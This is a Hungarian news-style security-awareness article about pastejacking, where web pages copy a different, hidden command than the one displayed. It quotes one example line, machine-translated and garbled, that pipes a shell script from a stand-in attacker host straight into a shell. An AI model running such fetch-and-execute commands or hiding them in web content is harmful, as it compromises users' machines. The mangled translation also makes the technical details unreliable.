- Mindannyian napi rendszerességgel másolunk és illesztünk be az internetről anélkül, hogy ismernénk a kockázatokat.
- Egy biztonsági szakértő időt szakított arra, hogy mindenkinek megmutassa a legrosszabb forgatókönyvet.
- Az internetről kapott parancsok beillesztése a terminálba gyors módja a feltörésnek
- Azok a parancsok, amelyekről azt hitte, hogy beilleszti a termináljába, valójában rosszindulatú kódok.
Igaz, hogy olyan korszakban élünk, ahol a gyorsaság a minden, és a gyors eredmények a legfontosabbak. Azonban kevesen állnak meg egy pillanatra és gondolnak a következményekre.
Programozók, adminisztrátorok és biztonsági kutatók milliói végeznek napi rendszerességgel olyan egyszerű feladatokat, mint például a parancsok másolása és beillesztése weboldalakról közvetlenül a számítógépük konzoljaira.
Bár sokan ezt meg sem gondolják, a következmények nagyobbak és veszélyesebbek, mint elsőre gondolná, különösen akkor, ha érzékeny vagy értékes adatokat tárol.
Egy jól ismert biztonsági szakértő szakított időt a megosztásra mi történhet valójában ha weboldalakról másol+beilleszt tartalmat.
A Copy+Paste egy egyszerű módja annak, hogy ténylegesen feltörjön
Gabriel Friedlander, aki a Wizer biztonsági tudatosság képzési platform alapítója, lerántotta a leplet egy olyan sémáról, amely kétszer is meggondolja, mielőtt parancsokat másol és beilleszt a weboldalakról.
Az internetről származó tartalmak másolása és beillesztése manapság olyan elterjedtté vált, hogy senki sem gondol rá.
Friedlander azonban arra figyelmeztet, hogy egyes weboldalak álságosabbak, mint azt elsőre gondolná az ember, és amit Ön úgy gondol, hogy lemásolt róla, az nagyon különbözik attól, amit valójában csinált.
A legrosszabb pedig az egészben, hogy a szükséges ismeretek vagy útmutatás nélkül az áldozatok csak a szöveg beillesztése után veszik észre hibájukat, ekkor már késő lehet.
A biztonsági elemző egy kis tesztet is kidolgozott blogja olvasóinak, hogy az emberek valóban megértsék, milyen könnyű akaratlanul is ajtót nyitni a kiberbűnözők előtt.
Adott egy parancsot, amelyet másolni kell, de a vonatkozó igazság csak akkor derül ki, ha beilleszti a szöveget, és megnézi, hogy valójában mit vezetett be a beállításban.
A fenti képernyőképen látható parancs kimásolása után a beillesztés eredménye sokkolja Önt, mivel messze van attól, amit azt hitt, hogy másolja.
becsavar http://attacker-domain: 8000/shell.sh | SHA vágólapon található teljesen más parancs mellett az újsor (vagy visszatérő) karakter at a vége azt jelenti, hogy a fenti példa azonnal végrehajtódik, amint közvetlenül beillesztik egy Linuxba terminál.
Ezért jobb, ha jobban tudatában van annak, hogy mi történik valójában, és ezt komoly biztonsági kockázatként kezeli. Nem állítjuk, hogy minden webhely elrejti a rosszindulatú tartalmat, de érdemes ezt figyelembe venni.
Előfordult már, hogy feltörték, amikor fura parancsokat illeszt be a termináljába? Ossza meg velünk tapasztalatait az alábbi megjegyzések részben.
